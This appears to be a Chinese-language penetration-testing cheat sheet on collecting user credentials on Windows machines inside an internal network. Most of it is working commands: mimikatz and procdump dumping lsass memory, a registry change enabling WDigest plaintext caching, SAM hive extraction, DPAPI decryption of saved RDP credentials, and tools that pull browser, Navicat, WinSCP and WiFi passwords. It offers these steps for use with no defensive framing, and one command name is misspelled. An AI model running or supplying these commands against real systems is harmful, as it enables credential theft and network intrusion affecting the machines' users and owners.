内网用户凭证收集

获取域内单机密码和哈希值

在线读取lsass进程内存

上传mimikatz到目标主机。

1
mimikatz.exe "privilege::debug" "sekurlsa::logonpassowrds full " exit

离线读取lsass内存文件

上传procdump,将lsass.exe的内存导出为lsass.dmp映像:

1
procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz分析:

1
mimikatz.exe "sekurlsa::minidump C:\Users\S\Desktop\lsass.dmp" "sekurlsa::logonpasswords full" exit

Winserver2012及以上开启WDigest功能,需要用户注销或重新登录才能获取密码明文。

1
2
3
4
#开启
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#关闭
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

在线读本地SAM

1
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

cmd5解密即可。

离线注册表导出SAM

1
2
3
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" exit

cmd5解密即可。

获取常见应用软件凭据

RDP

1
2
3
4
cmdkey /list
dir /a %USERPROFILE%\AppData\Local\Microsoft\Credentials\*
mimikatz.exe "privilege::debug" "dpapi::cred /in:%USERPROFILE%\AppData\Local\Microsoft\Credentials\F3D52AEECC8AEE52FC2A608E9C17229C" exit
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit

浏览器

1
hack-browser-data.exe

这工具一堆bug,只能说一言难尽,

1
SharpDecryptPwd.exe Navicat

Winscp

1
SharpDecryptPwd.exe WinSCP

WiFi

Win

1
2
netsh wlan show profiles
netsh wlan show profile 配置文件名 key=clear